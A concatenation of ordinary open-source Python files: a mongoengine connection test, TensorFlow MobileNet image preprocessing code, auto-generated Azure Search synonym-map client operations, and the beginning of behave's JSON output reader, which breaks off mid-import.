self.assertTrue(get_tz_awareness(conn))
connect('mongoenginetest2', alias='t2')
conn = get_connection('t2')
self.assertFalse(get_tz_awareness(conn))
def test_datetime(self):
connect('mongoenginetest', tz_aware=True)
d = datetime.datetime(2010, 5, 5, tzinfo=utc)
class DateDoc(Document):
the_date = DateTimeField(required=True)
DateDoc.drop_collection()
DateDoc(the_date=d).save()
date_doc = DateDoc.objects.first()
self.assertEqual(d, date_doc.the_date)
def test_multiple_connection_settings(self):
connect('mongoenginetest', alias='t1', host="localhost")
connect('mongoenginetest2', alias='t2', host="127.0.0.1")
mongo_connections = mongoengine.connection._connections
self.assertEqual(len(mongo_connections.items()), 2)
self.assertTrue('t1' in mongo_connections.keys())
self.assertTrue('t2' in mongo_connections.keys())
if not IS_PYMONGO_3:
self.assertEqual(mongo_connections['t1'].host, 'localhost')
self.assertEqual(mongo_connections['t2'].host, '127.0.0.1')
else:
# Handle PyMongo 3+ Async Connection
# Ensure we are connected, throws ServerSelectionTimeoutError otherwise.
# Purposely not catching exception to fail test if thrown.
mongo_connections['t1'].server_info()
mongo_connections['t2'].server_info()
self.assertEqual(mongo_connections['t1'].address[0], 'localhost')
self.assertEqual(mongo_connections['t2'].address[0], '127.0.0.1')
if __name__ == '__main__':
unittest.main()
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Provides utilities to preprocess images for the MobileNet networks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.python.ops import control_flow_ops
def apply_with_random_selector(x, func, num_cases):
"""Computes func(x, sel), with sel sampled from [0...num_cases-1].
Args:
x: input Tensor.
func: Python function to apply.
num_cases: Python int32, number of cases to sample sel from.
Returns:
The result of func(x, sel), where func receives the value of the
selector as a python integer, but sel is sampled dynamically.
"""
sel = tf.random_uniform([], maxval=num_cases, dtype=tf.int32)
# Pass the real x only to one of the func calls.
return control_flow_ops.merge([
func(control_flow_ops.switch(x, tf.equal(sel, case))[1], case)
for case in range(num_cases)])[0]
def distort_color(image, color_ordering=0, fast_mode=True, scope=None):
"""Distort the color of a Tensor image.
Each color distortion is non-commutative and thus ordering of the color ops
matters. Ideally we would randomly permute the ordering of the color ops.
Rather than adding that level of complication, we select a distinct ordering
of color ops for each preprocessing thread.
Args:
image: 3-D Tensor containing single image in [0, 1].
color_ordering: Python int, a type of distortion (valid values: 0-3).
fast_mode: Avoids slower ops (random_hue and random_contrast)
scope: Optional scope for name_scope.
Returns:
3-D Tensor color-distorted image on range [0, 1]
Raises:
ValueError: if color_ordering not in [0, 3]
"""
with tf.name_scope(scope, 'distort_color', [image]):
if fast_mode:
if color_ordering == 0:
image = tf.image.random_brightness(image, max_delta=32. / 255.)
image = tf.image.random_saturation(image, lower=0.5, upper=1.5)
else:
image = tf.image.random_saturation(image, lower=0.5, upper=1.5)
image = tf.image.random_brightness(image, max_delta=32. / 255.)
else:
if color_ordering == 0:
image = tf.image.random_brightness(image, max_delta=32. / 255.)
image = tf.image.random_saturation(image, lower=0.5, upper=1.5)
image = tf.image.random_hue(image, max_delta=0.2)
image = tf.image.random_contrast(image, lower=0.5, upper=1.5)
elif color_ordering == 1:
image = tf.image.random_saturation(image, lower=0.5, upper=1.5)
image = tf.image.random_brightness(image, max_delta=32. / 255.)
image = tf.image.random_contrast(image, lower=0.5, upper=1.5)
image = tf.image.random_hue(image, max_delta=0.2)
elif color_ordering == 2:
image = tf.image.random_contrast(image, lower=0.5, upper=1.5)
image = tf.image.random_hue(image, max_delta=0.2)
image = tf.image.random_brightness(image, max_delta=32. / 255.)
image = tf.image.random_saturation(image, lower=0.5, upper=1.5)
elif color_ordering == 3:
image = tf.image.random_hue(image, max_delta=0.2)
image = tf.image.random_saturation(image, lower=0.5, upper=1.5)
image = tf.image.random_contrast(image, lower=0.5, upper=1.5)
image = tf.image.random_brightness(image, max_delta=32. / 255.)
else:
raise ValueError('color_ordering must be in [0, 3]')
# The random_* ops do not necessarily clamp.
return tf.clip_by_value(image, 0.0, 1.0)
def distorted_bounding_box_crop(image,
bbox,
min_object_covered=0.1,
aspect_ratio_range=(0.75, 1.33),
area_range=(0.05, 1.0),
max_attempts=100,
scope=None):
"""Generates cropped_image using a one of the bboxes randomly distorted.
See `tf.image.sample_distorted_bounding_box` for more documentation.
Args:
image: 3-D Tensor of image (it will be converted to floats in [0, 1]).
bbox: 3-D float Tensor of bounding boxes arranged [1, num_boxes, coords]
where each coordinate is [0, 1) and the coordinates are arranged
as [ymin, xmin, ymax, xmax]. If num_boxes is 0 then it would use the whole
image.
min_object_covered: An optional `float`. Defaults to `0.1`. The cropped
area of the image must contain at least this fraction of any bounding box
supplied.
aspect_ratio_range: An optional list of `floats`. The cropped area of the
image must have an aspect ratio = width / height within this range.
area_range: An optional list of `floats`. The cropped area of the image
must contain a fraction of the supplied image within this range.
max_attempts: An optional `int`. Number of attempts at generating a cropped
region of the image of the specified constraints. After `max_attempts`
failures, return the entire image.
scope: Optional scope for name_scope.
Returns:
A tuple, a 3-D Tensor cropped_image and the distorted bbox
"""
with tf.name_scope(scope, 'distorted_bounding_box_crop', [image, bbox]):
# Each bounding box has shape [1, num_boxes, box coords] and
# the coordinates are ordered [ymin, xmin, ymax, xmax].
# A large fraction of image datasets contain a human-annotated bounding
# box delineating the region of the image containing the object of interest.
# We choose to create a new bounding box for the object which is a randomly
# distorted version of the human-annotated bounding box that obeys an
# allowed range of aspect ratios, sizes and overlap with the human-annotated
# bounding box. If no box is supplied, then we assume the bounding box is
# the entire image.
sample_distorted_bounding_box = tf.image.sample_distorted_bounding_box(
tf.shape(image),
bounding_boxes=bbox,
min_object_covered=min_object_covered,
aspect_ratio_range=aspect_ratio_range,
area_range=area_range,
max_attempts=max_attempts,
use_image_if_no_bounding_boxes=True)
bbox_begin, bbox_size, distort_bbox = sample_distorted_bounding_box
# Crop the image to the specified bounding box.
cropped_image = tf.slice(image, bbox_begin, bbox_size)
return cropped_image, distort_bbox
def preprocess_for_train(image, height, width, bbox,
fast_mode=True,
scope=None):
"""Distort one image for training a network.
Distorting images provides a useful technique for augmenting the data
set during training in order to make the network invariant to aspects
of the image that do not affect the label.
Additionally it creates image summaries to display the different
transformations applied to the image.
Args:
image: 3-D Tensor of image. If dtype is tf.float32 then the range should be
[0, 1], otherwise it would be converted to tf.float32 assuming that the range
is [0, MAX], where MAX is the largest positive representable number for
int(8/16/32) data type (see `tf.image.convert_image_dtype` for details).
height: integer
width: integer
bbox: 3-D float Tensor of bounding boxes arranged [1, num_boxes, coords]
where each coordinate is [0, 1) and the coordinates are arranged
as [ymin, xmin, ymax, xmax].
fast_mode: Optional boolean, if True avoids slower transformations (i.e.
bi-cubic resizing, random_hue or random_contrast).
scope: Optional scope for name_scope.
Returns:
3-D float Tensor of distorted image used for training with range [-1, 1].
"""
with tf.name_scope(scope, 'distort_image', [image, height, width, bbox]):
if bbox is None:
bbox = tf.constant([0.0, 0.0, 1.0, 1.0],
dtype=tf.float32,
shape=[1, 1, 4])
if image.dtype != tf.float32:
image = tf.image.convert_image_dtype(image, dtype=tf.float32)
# Each bounding box has shape [1, num_boxes, box coords] and
# the coordinates are ordered [ymin, xmin, ymax, xmax].
image_with_box = tf.image.draw_bounding_boxes(tf.expand_dims(image, 0),
bbox)
tf.summary.image('image_with_bounding_boxes', image_with_box)
distorted_image, distorted_bbox = distorted_bounding_box_crop(image, bbox)
# Restore the shape since the dynamic slice based upon the bbox_size loses
# the third dimension.
distorted_image.set_shape([None, None, 3])
image_with_distorted_box = tf.image.draw_bounding_boxes(
tf.expand_dims(image, 0), distorted_bbox)
tf.summary.image('images_with_distorted_bounding_box',
image_with_distorted_box)
# This resizing operation may distort the images because the aspect
# ratio is not respected. We select a resize method at random via
# apply_with_random_selector.
# Note that ResizeMethod contains 4 enumerated resizing methods.
# We select only 1 case for fast_mode bilinear.
num_resize_cases = 1 if fast_mode else 4
distorted_image = apply_with_random_selector(
distorted_image,
lambda x, method: tf.image.resize_images(x, [height, width], method=method),
num_cases=num_resize_cases)
tf.summary.image('cropped_resized_image',
tf.expand_dims(distorted_image, 0))
# Randomly flip the image horizontally.
distorted_image = tf.image.random_flip_left_right(distorted_image)
# Randomly distort the colors. There are 4 ways to do it.
distorted_image = apply_with_random_selector(
distorted_image,
lambda x, ordering: distort_color(x, ordering, fast_mode),
num_cases=4)
tf.summary.image('final_distorted_image',
tf.expand_dims(distorted_image, 0))
distorted_image = tf.subtract(distorted_image, 0.5)
distorted_image = tf.multiply(distorted_image, 2.0)
return distorted_image
def preprocess_for_eval(image, height, width,
central_fraction=0.875, scope=None):
"""Prepare one image for evaluation.
If height and width are specified it would output an image with that size by
applying resize_bilinear.
If central_fraction is specified it would crop the central fraction of the
input image.
Args:
image: 3-D Tensor of image. If dtype is tf.float32 then the range should be
[0, 1], otherwise it would be converted to tf.float32 assuming that the range
is [0, MAX], where MAX is the largest positive representable number for
int(8/16/32) data type (see `tf.image.convert_image_dtype` for details)
height: integer
width: integer
central_fraction: Optional Float, fraction of the image to crop.
scope: Optional scope for name_scope.
Returns:
3-D float Tensor of prepared image.
"""
with tf.name_scope(scope, 'eval_image', [image, height, width]):
if image.dtype != tf.float32:
image = tf.image.convert_image_dtype(image, dtype=tf.float32)
# Crop the central region of the image with an area containing 87.5% of
# the original image.
if central_fraction:
image = tf.image.central_crop(image, central_fraction=central_fraction)
if height and width:
# Resize the image to the specified height and width.
image = tf.expand_dims(image, 0)
image = tf.image.resize_bilinear(image, [height, width],
align_corners=False)
image = tf.squeeze(image, [0])
image = tf.subtract(image, 0.5)
image = tf.multiply(image, 2.0)
return image
def preprocess_image(image, height, width,
is_training=False,
bbox=None,
fast_mode=True):
"""Pre-process one image for training or evaluation.
Args:
image: 3-D Tensor [height, width, channels] with the image.
height: integer, image expected height.
width: integer, image expected width.
is_training: Boolean. If true it would transform an image for training,
otherwise it would transform it for evaluation.
bbox: 3-D float Tensor of bounding boxes arranged [1, num_boxes, coords]
where each coordinate is [0, 1) and the coordinates are arranged as
[ymin, xmin, ymax, xmax].
fast_mode: Optional boolean, if True avoids slower transformations.
Returns:
3-D float Tensor containing an appropriately scaled image
Raises:
ValueError: if the user does not provide a bounding box
"""
if is_training:
return preprocess_for_train(image, height, width, bbox, fast_mode)
else:
return preprocess_for_eval(image, height, width)
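# A minimal usage sketch, assuming the TensorFlow 1.x graph-mode API used
# above; the JPEG path and the bounding box values below are hypothetical.
if __name__ == '__main__':
    example_raw = tf.read_file('/tmp/example.jpg')
    example_image = tf.image.decode_jpeg(example_raw, channels=3)
    # A single bounding box covering most of the frame: [ymin, xmin, ymax, xmax].
    example_bbox = tf.constant([0.1, 0.1, 0.9, 0.9],
                               dtype=tf.float32, shape=[1, 1, 4])
    train_tensor = preprocess_image(example_image, 299, 299,
                                    is_training=True, bbox=example_bbox)
    eval_tensor = preprocess_image(example_image, 299, 299, is_training=False)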
|
|
# pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
from msrest import Serializer
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
# fmt: off
def build_create_or_update_request(
synonym_map_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
prefer = kwargs.pop('prefer', "return=representation") # type: str
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
x_ms_client_request_id = kwargs.pop('x_ms_client_request_id', None) # type: Optional[str]
if_match = kwargs.pop('if_match', None) # type: Optional[str]
if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str]
accept = "application/json"
# Construct URL
_url = kwargs.pop("template_url", "/synonymmaps(\'{synonymMapName}\')")
path_format_arguments = {
"synonymMapName": _SERIALIZER.url("synonym_map_name", synonym_map_name, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
_query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if x_ms_client_request_id is not None:
_header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("x_ms_client_request_id", x_ms_client_request_id, 'str')
if if_match is not None:
_header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str')
if if_none_match is not None:
_header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str')
_header_parameters['Prefer'] = _SERIALIZER.header("prefer", prefer, 'str')
if content_type is not None:
_header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=_url,
params=_query_parameters,
headers=_header_parameters,
**kwargs
)
def build_delete_request(
synonym_map_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
x_ms_client_request_id = kwargs.pop('x_ms_client_request_id', None) # type: Optional[str]
if_match = kwargs.pop('if_match', None) # type: Optional[str]
if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str]
accept = "application/json"
# Construct URL
_url = kwargs.pop("template_url", "/synonymmaps(\'{synonymMapName}\')")
path_format_arguments = {
"synonymMapName": _SERIALIZER.url("synonym_map_name", synonym_map_name, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
_query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if x_ms_client_request_id is not None:
_header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("x_ms_client_request_id", x_ms_client_request_id, 'str')
if if_match is not None:
_header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str')
if if_none_match is not None:
_header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str')
_header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="DELETE",
url=_url,
params=_query_parameters,
headers=_header_parameters,
**kwargs
)
def build_get_request(
synonym_map_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
x_ms_client_request_id = kwargs.pop('x_ms_client_request_id', None) # type: Optional[str]
accept = "application/json"
# Construct URL
_url = kwargs.pop("template_url", "/synonymmaps(\'{synonymMapName}\')")
path_format_arguments = {
"synonymMapName": _SERIALIZER.url("synonym_map_name", synonym_map_name, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
_query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if x_ms_client_request_id is not None:
_header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("x_ms_client_request_id", x_ms_client_request_id, 'str')
_header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_query_parameters,
headers=_header_parameters,
**kwargs
)
def build_list_request(
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
select = kwargs.pop('select', None) # type: Optional[str]
x_ms_client_request_id = kwargs.pop('x_ms_client_request_id', None) # type: Optional[str]
accept = "application/json"
# Construct URL
_url = kwargs.pop("template_url", "/synonymmaps")
# Construct parameters
_query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if select is not None:
_query_parameters['$select'] = _SERIALIZER.query("select", select, 'str')
_query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if x_ms_client_request_id is not None:
_header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("x_ms_client_request_id", x_ms_client_request_id, 'str')
_header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_query_parameters,
headers=_header_parameters,
**kwargs
)
def build_create_request(
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
x_ms_client_request_id = kwargs.pop('x_ms_client_request_id', None) # type: Optional[str]
accept = "application/json"
# Construct URL
_url = kwargs.pop("template_url", "/synonymmaps")
# Construct parameters
_query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
_query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if x_ms_client_request_id is not None:
_header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("x_ms_client_request_id", x_ms_client_request_id, 'str')
if content_type is not None:
_header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=_url,
params=_query_parameters,
headers=_header_parameters,
**kwargs
)
# fmt: on
class SynonymMapsOperations(object):
"""SynonymMapsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.search.documents.indexes.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def create_or_update(
self,
synonym_map_name, # type: str
synonym_map, # type: "_models.SynonymMap"
if_match=None, # type: Optional[str]
if_none_match=None, # type: Optional[str]
request_options=None, # type: Optional["_models.RequestOptions"]
**kwargs # type: Any
):
# type: (...) -> "_models.SynonymMap"
"""Creates a new synonym map or updates a synonym map if it already exists.
:param synonym_map_name: The name of the synonym map to create or update.
:type synonym_map_name: str
:param synonym_map: The definition of the synonym map to create or update.
:type synonym_map: ~azure.search.documents.indexes.models.SynonymMap
:param if_match: Defines the If-Match condition. The operation will be performed only if the
ETag on the server matches this value.
:type if_match: str
:param if_none_match: Defines the If-None-Match condition. The operation will be performed only
if the ETag on the server does not match this value.
:type if_none_match: str
:param request_options: Parameter group.
:type request_options: ~azure.search.documents.indexes.models.RequestOptions
:keyword prefer: For HTTP PUT requests, instructs the service to return the created/updated
resource on success. The default value is "return=representation". Note that overriding this
default value may result in unsupported behavior.
:paramtype prefer: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SynonymMap, or the result of cls(response)
:rtype: ~azure.search.documents.indexes.models.SynonymMap
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SynonymMap"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
prefer = kwargs.pop('prefer', "return=representation") # type: str
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_x_ms_client_request_id = None
if request_options is not None:
_x_ms_client_request_id = request_options.x_ms_client_request_id
_json = self._serialize.body(synonym_map, 'SynonymMap')
request = build_create_or_update_request(
synonym_map_name=synonym_map_name,
prefer=prefer,
api_version=api_version,
content_type=content_type,
json=_json,
x_ms_client_request_id=_x_ms_client_request_id,
if_match=if_match,
if_none_match=if_none_match,
template_url=self.create_or_update.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.SearchError, pipeline_response)
raise HttpResponseError(response=response, model=error)
if response.status_code == 200:
deserialized = self._deserialize('SynonymMap', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('SynonymMap', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': "/synonymmaps(\'{synonymMapName}\')"} # type: ignore
@distributed_trace
def delete( # pylint: disable=inconsistent-return-statements
self,
synonym_map_name, # type: str
if_match=None, # type: Optional[str]
if_none_match=None, # type: Optional[str]
request_options=None, # type: Optional["_models.RequestOptions"]
**kwargs # type: Any
):
# type: (...) -> None
"""Deletes a synonym map.
:param synonym_map_name: The name of the synonym map to delete.
:type synonym_map_name: str
:param if_match: Defines the If-Match condition. The operation will be performed only if the
ETag on the server matches this value.
:type if_match: str
:param if_none_match: Defines the If-None-Match condition. The operation will be performed only
if the ETag on the server does not match this value.
:type if_none_match: str
:param request_options: Parameter group.
:type request_options: ~azure.search.documents.indexes.models.RequestOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
_x_ms_client_request_id = None
if request_options is not None:
_x_ms_client_request_id = request_options.x_ms_client_request_id
request = build_delete_request(
synonym_map_name=synonym_map_name,
api_version=api_version,
x_ms_client_request_id=_x_ms_client_request_id,
if_match=if_match,
if_none_match=if_none_match,
template_url=self.delete.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [204, 404]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.SearchError, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': "/synonymmaps(\'{synonymMapName}\')"} # type: ignore
@distributed_trace
def get(
self,
synonym_map_name, # type: str
request_options=None, # type: Optional["_models.RequestOptions"]
**kwargs # type: Any
):
# type: (...) -> "_models.SynonymMap"
"""Retrieves a synonym map definition.
:param synonym_map_name: The name of the synonym map to retrieve.
:type synonym_map_name: str
:param request_options: Parameter group.
:type request_options: ~azure.search.documents.indexes.models.RequestOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SynonymMap, or the result of cls(response)
:rtype: ~azure.search.documents.indexes.models.SynonymMap
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SynonymMap"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
_x_ms_client_request_id = None
if request_options is not None:
_x_ms_client_request_id = request_options.x_ms_client_request_id
request = build_get_request(
synonym_map_name=synonym_map_name,
api_version=api_version,
x_ms_client_request_id=_x_ms_client_request_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.SearchError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SynonymMap', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': "/synonymmaps(\'{synonymMapName}\')"} # type: ignore
@distributed_trace
def list(
self,
select=None, # type: Optional[str]
request_options=None, # type: Optional["_models.RequestOptions"]
**kwargs # type: Any
):
# type: (...) -> "_models.ListSynonymMapsResult"
"""Lists all synonym maps available for a search service.
:param select: Selects which top-level properties of the synonym maps to retrieve. Specified as
a comma-separated list of JSON property names, or '*' for all properties. The default is all
properties.
:type select: str
:param request_options: Parameter group.
:type request_options: ~azure.search.documents.indexes.models.RequestOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ListSynonymMapsResult, or the result of cls(response)
:rtype: ~azure.search.documents.indexes.models.ListSynonymMapsResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListSynonymMapsResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
_x_ms_client_request_id = None
if request_options is not None:
_x_ms_client_request_id = request_options.x_ms_client_request_id
request = build_list_request(
api_version=api_version,
select=select,
x_ms_client_request_id=_x_ms_client_request_id,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.SearchError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('ListSynonymMapsResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list.metadata = {'url': "/synonymmaps"} # type: ignore
@distributed_trace
def create(
self,
synonym_map, # type: "_models.SynonymMap"
request_options=None, # type: Optional["_models.RequestOptions"]
**kwargs # type: Any
):
# type: (...) -> "_models.SynonymMap"
"""Creates a new synonym map.
:param synonym_map: The definition of the synonym map to create.
:type synonym_map: ~azure.search.documents.indexes.models.SynonymMap
:param request_options: Parameter group.
:type request_options: ~azure.search.documents.indexes.models.RequestOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SynonymMap, or the result of cls(response)
:rtype: ~azure.search.documents.indexes.models.SynonymMap
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SynonymMap"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_x_ms_client_request_id = None
if request_options is not None:
_x_ms_client_request_id = request_options.x_ms_client_request_id
_json = self._serialize.body(synonym_map, 'SynonymMap')
request = build_create_request(
api_version=api_version,
content_type=content_type,
json=_json,
x_ms_client_request_id=_x_ms_client_request_id,
template_url=self.create.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.SearchError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SynonymMap', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create.metadata = {'url': "/synonymmaps"} # type: ignore
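# A minimal sketch, assuming the request builders above are invoked directly;
# in normal use SynonymMapsOperations builds and sends these requests through
# the client pipeline, and the synonym map name below is hypothetical.
if __name__ == "__main__":
    _example_request = build_get_request("my-synonym-map")
    print(_example_request.method, _example_request.url)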
|
|
# -*- coding: utf-8 -*-
"""
Read behave's JSON output files and store retrieved information in
:mod:`behave.model` elements.
Utility to retrieve runtime information from behave's JSON output.
REQUIRES: Python >= 2.6 (json module is part of Python standard library)
"""
__author__ = "Jens Engel"
# -- IMPORTS:
from behave import model
import codecs
try:
import json
except ImportError:
# -- PYTHON 2.5 backward compatible: Use simplejson module.
